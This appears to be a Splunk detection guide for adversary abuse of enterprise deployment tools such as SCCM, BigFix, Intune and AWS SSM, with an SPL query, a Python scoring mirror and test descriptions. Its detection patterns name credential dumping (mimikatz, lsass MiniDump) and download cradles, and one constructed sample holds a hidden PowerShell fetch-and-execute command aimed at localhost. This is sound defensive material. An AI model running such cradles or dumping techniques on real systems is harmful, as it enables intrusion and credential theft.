Detect Software Deployment Tools in Splunk
Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications — including Microsoft SCCM/ConfigMgr, HCL BigFix, PDQ Deploy, Symantec Altiris, Microsoft Intune, Azure Arc, AWS Systems Manager (SSM), and RAdmin — are widely deployed for enterprise endpoint management. Adversaries who compromise or abuse these platforms gain the ability to execute arbitrary commands across all enrolled systems simultaneously, often running as SYSTEM or with elevated privileges. Real-world abuse includes APT32 compromising McAfee ePO for malware distribution, Sandworm Team using RemoteExec for agentless lateral movement, Medusa Group deploying ransomware payloads via BigFix and PDQ Deploy, and Threat Group-1314 abusing Altiris for network-wide propagation.
MITRE ATT&CK
- Tactic: Execution, Lateral Movement
- Technique: T1072 Software Deployment Tools
- Canonical reference: https://attack.mitre.org/techniques/T1072/
SPL Detection Query
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(ParentImage="*\\ccmexec.exe" OR ParentImage="*\\ccmsetup.exe"
OR ParentImage="*\\besclient.exe" OR ParentImage="*\\besservice.exe"
OR ParentImage="*\\PDQDeployRunner.exe" OR ParentImage="*\\PDQDeploy.exe"
OR ParentImage="*\\AeXNSAgent.exe" OR ParentImage="*\\AeXSWDSvc.exe"
OR ParentImage="*\\IntuneManagementExtension.exe"
OR ParentImage="*\\amazon-ssm-agent.exe"
OR ParentImage="*\\RemoteExec.exe"
OR ParentImage="*\\radmin.exe" OR ParentImage="*\\r_server.exe")
(Image="*\\cmd.exe" OR Image="*\\powershell.exe" OR Image="*\\pwsh.exe"
OR Image="*\\wscript.exe" OR Image="*\\cscript.exe" OR Image="*\\mshta.exe"
OR Image="*\\certutil.exe" OR Image="*\\bitsadmin.exe" OR Image="*\\rundll32.exe"
OR Image="*\\regsvr32.exe" OR Image="*\\wmic.exe" OR Image="*\\net.exe"
OR Image="*\\net1.exe" OR Image="*\\whoami.exe" OR Image="*\\nltest.exe"
OR Image="*\\schtasks.exe" OR Image="*\\sc.exe" OR Image="*\\reg.exe")
| eval cmd=lower(CommandLine)
| eval CredentialAccess=if(match(cmd, "(lsass|procdump|mimikatz|sekurlsa|comsvcs|ntds\.dit|minidump)"), 1, 0)
| eval LateralMovement=if(match(cmd, "(psexec|wmic\s+/node|net\s+use|xcopy|robocopy|enter-pssession)"), 1, 0)
| eval PersistenceAttempt=if(match(cmd, "(schtasks\s+/create|sc\s+create|reg\s+add.*(run|startup)|localgroup.*administrator)"), 1, 0)
| eval DownloadAttempt=if(match(cmd, "(downloadstring|downloadfile|invoke-webrequest|iwr\s|certutil.*urlcache|bitsadmin.*transfer|net\.webclient|start-bitstransfer)"), 1, 0)
| eval EncodedCmd=if(match(cmd, "(-encodedcommand|-enc\s|-e\s|-ec\s)"), 1, 0)
| eval ReconActivity=if(match(cmd, "(whoami|net\s+user|net\s+group|nltest|ipconfig|systeminfo|netstat|tasklist|net\s+localgroup)"), 1, 0)
| eval HiddenExec=if(match(cmd, "(-windowstyle\s+hidden|-w\s+hidden|-nop\s|-noni\s)"), 1, 0)
| eval RiskScore=CredentialAccess*5 + LateralMovement*4 + PersistenceAttempt*4 + DownloadAttempt*3 + EncodedCmd*2 + (ReconActivity * HiddenExec)*3 + ReconActivity*1
| where RiskScore > 0
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, CredentialAccess, LateralMovement, PersistenceAttempt, DownloadAttempt, EncodedCmd, ReconActivity, HiddenExec, RiskScore
| sort - RiskScore, - _time

This query detects suspicious commands executed by software deployment tool agent processes using Sysmon Event ID 1 (Process Creation). It identifies known deployment agents as parent processes spawning living-off-the-land binaries with malicious command patterns, and assigns weighted risk scores per attack category: credential access (5), lateral movement (4), persistence attempts (4), download cradles (3), encoded commands (2), stealthy reconnaissance (3), and general recon (1). Alerts with RiskScore >= 4 warrant immediate investigation; high-confidence detections typically score 5+.
Data Sources
Required Sourcetypes
False Positives & Tuning
- SCCM deployment scripts legitimately spawn PowerShell and cmd.exe — tune by allowlisting known-good ParentCommandLine patterns associated with authorized package GUIDs
- BigFix and PDQ Deploy administrative tasks frequently trigger this detection during patch cycles; suppress during scheduled maintenance windows using a lookup table of authorized job IDs
- Intune PowerShell scripts deployed by administrators appear as IntuneManagementExtension.exe spawning PowerShell with -ExecutionPolicy Bypass, which is a built-in Intune behavior
- AWS SSM Run Command on Windows EC2 instances appears as amazon-ssm-agent.exe spawning cmd.exe or PowerShell for authorized runbook execution
- Automated patch management tools use certutil and bitsadmin for update package verification, triggering DownloadAttempt flags on patch Tuesdays
- Inventory scans using net.exe commands trigger ReconActivity — correlate against scheduled maintenance windows and approved scan job timers
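As an added example (not code from the page, Splunk or any of the vendors named), the following Python mirrors the query's parent/child filter and RiskScore arithmetic together with the allowlist tuning described in the False Positives section, and runs both over constructed Sysmon Event ID 1 samples modelled on Tests 1 and 2 below. Hosts, agent paths and the package-id pattern are placeholders.

```python
import re
# Mirror of the page's SPL parent/child filter (lower-cased basenames); constructed, not Splunk code
AGENT_PARENTS = {"ccmexec.exe", "ccmsetup.exe", "besclient.exe", "besservice.exe", "pdqdeployrunner.exe",
                 "pdqdeploy.exe", "aexnsagent.exe", "aexswdsvc.exe", "intunemanagementextension.exe",
                 "amazon-ssm-agent.exe", "remoteexec.exe", "radmin.exe", "r_server.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "certutil.exe",
           "bitsadmin.exe", "rundll32.exe", "regsvr32.exe", "wmic.exe", "net.exe", "net1.exe", "whoami.exe",
           "nltest.exe", "schtasks.exe", "sc.exe", "reg.exe"}
# (flag, regex, weight) as in the query's eval/match stages; HiddenExec only counts via ReconActivity*HiddenExec*3
CATEGORIES = [
    ("CredentialAccess", r"(lsass|procdump|mimikatz|sekurlsa|comsvcs|ntds\.dit|minidump)", 5),
    ("LateralMovement", r"(psexec|wmic\s+/node|net\s+use|xcopy|robocopy|enter-pssession)", 4),
    ("PersistenceAttempt", r"(schtasks\s+/create|sc\s+create|reg\s+add.*(run|startup)|localgroup.*administrator)", 4),
    ("DownloadAttempt", r"(downloadstring|downloadfile|invoke-webrequest|iwr\s|certutil.*urlcache|bitsadmin.*transfer|net\.webclient|start-bitstransfer)", 3),
    ("EncodedCmd", r"(-encodedcommand|-enc\s|-e\s|-ec\s)", 2),
    ("ReconActivity", r"(whoami|net\s+user|net\s+group|nltest|ipconfig|systeminfo|netstat|tasklist|net\s+localgroup)", 1),
    ("HiddenExec", r"(-windowstyle\s+hidden|-w\s+hidden|-nop\s|-noni\s)", 0),
]
def basename(path): return path.lower().rsplit("\\", 1)[-1]

def score_event(ev):
    """Category flags and RiskScore for one Sysmon EID 1 event; None if the parent/child filter excludes it."""
    if basename(ev["ParentImage"]) not in AGENT_PARENTS or basename(ev["Image"]) not in LOLBINS:
        return None
    cmd = ev["CommandLine"].lower()  # the query's eval cmd=lower(CommandLine)
    flags = {name: int(re.search(rx, cmd) is not None) for name, rx, _ in CATEGORIES}
    risk = sum(flags[n] * w for n, _, w in CATEGORIES) + flags["ReconActivity"] * flags["HiddenExec"] * 3
    return {**flags, "RiskScore": risk}

def triage(events, allowlist=()):
    """Allowlist tuning: suppress events whose ParentCommandLine+CommandLine match a known-good pattern; (host, RiskScore) for RiskScore > 0, highest first."""
    hits = []
    for ev in events:
        scored = score_event(ev)
        ctx = (ev.get("ParentCommandLine", "") + " " + ev["CommandLine"]).lower()
        if scored and scored["RiskScore"] > 0 and not any(re.search(p, ctx) for p in allowlist):
            hits.append((ev["host"], scored["RiskScore"]))
    return sorted(hits, key=lambda h: -h[1])  # the query's sort - RiskScore

def ev(host, parent, image, cmd, pcmd=""):  # constructor for the constructed samples below
    return {"host": host, "ParentImage": parent, "Image": image, "CommandLine": cmd, "ParentCommandLine": pcmd}
CCM, INTUNE = r"C:\Windows\CCM\CcmExec.exe", r"C:\Program Files\IntuneManagementExtension.exe"  # placeholder paths
SAMPLES = [  # constructed samples (not real telemetry), modelled on Tests 1 and 2 on this page
    ev("ws01", CCM, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami /all && nltest /domain_trusts"),
    ev("ws02", INTUNE, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -WindowStyle Hidden -NoProfile -NonInteractive -c \"IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:9999/x')\""),
    ev("ws03", INTUNE, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden -c \"ipconfig /all; systeminfo\""),
    ev("ws04", CCM, r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami", pcmd=r"CcmExec.exe pkg-ab12cd34"),  # allowlisted
    ev("ws05", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c whoami"),  # not an agent parent
]
KNOWN_GOOD = (r"pkg-ab12cd34",)  # placeholder for an authorized package-id pattern in ParentCommandLine
```

The page's regexes are kept verbatim so tuning can be tested against them; note that the LateralMovement pattern `net\s+use` also matches `net user`, so a recon-only command line containing it scores 4 for lateral movement as well.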
Other platforms for T1072
Testing Methodology
Validate this detection against 5 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Simulate Malicious Reconnaissance via Deployment Tool Child Process
Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'whoami /all', 'net user /domain', 'nltest /domain_trusts', and 'net localgroup administrators'. Security Event ID 4688 (with command line auditing enabled) showing the full command chain. Each net.exe/nltest.exe subprocess also generates its own Event ID 1.
- Test 2: Simulate Hidden PowerShell Execution with Download Cradle via Deployment Context
Expected signal: Sysmon Event ID 1: powershell.exe with CommandLine containing '-ExecutionPolicy Bypass', '-WindowStyle Hidden', '-NoProfile', '-NonInteractive', 'Net.WebClient', and 'DownloadString'. Sysmon Event ID 3: Network Connection attempt to 127.0.0.1:9999 (connection refused). PowerShell ScriptBlock Log Event ID 4104 with full script content.
- Test 3: Simulate Credential Staging via Deployment Tool (comsvcs MiniDump)
Expected signal: Sysmon Event ID 1: powershell.exe with CommandLine referencing 'comsvcs.dll' and 'MiniDump'. Sysmon Event ID 1 child: rundll32.exe with CommandLine 'comsvcs.dll, MiniDump <PID>'. Sysmon Event ID 10: Process Access event targeting lsass.exe with GrantedAccess 0x1FFFFF. Security Event ID 4656: Handle request to lsass.exe. EDR should generate an LSASS credential access alert independently.
- Test 4: Simulate AWS SSM Run Command Abuse
Expected signal: AWS CloudTrail: EventName=SendCommand, EventSource=ssm.amazonaws.com, with userIdentity.arn of the calling principal, sourceIPAddress of the attacker host, and requestParameters.documentName=AWS-RunShellScript. SSM agent log on target instance: /var/log/amazon/ssm/amazon-ssm-agent.log shows command receipt. CloudWatch Logs (if configured): command output stored at the configured S3 output bucket.
- Test 5: Simulate Lateral Movement via Deployment Tool (Remote Service Installation)
Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'sc \\127.0.0.1 create' and service binary path. Event ID 7045 (System log): New service 'df00tech_test_svc' installed on the system. Security Event ID 4697: A service was installed in the system (if service installation auditing is enabled). Security Event ID 4624: Logon event for the remote connection authentication.
References (10)
- https://attack.mitre.org/techniques/T1072/
- https://www.mandiant.com/resources/blog/apt32-targeting-private-sector
- https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/
- https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan
- https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a
- https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem
- https://learn.microsoft.com/en-us/mem/configmgr/core/servers/manage/cmtrace
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md
- https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf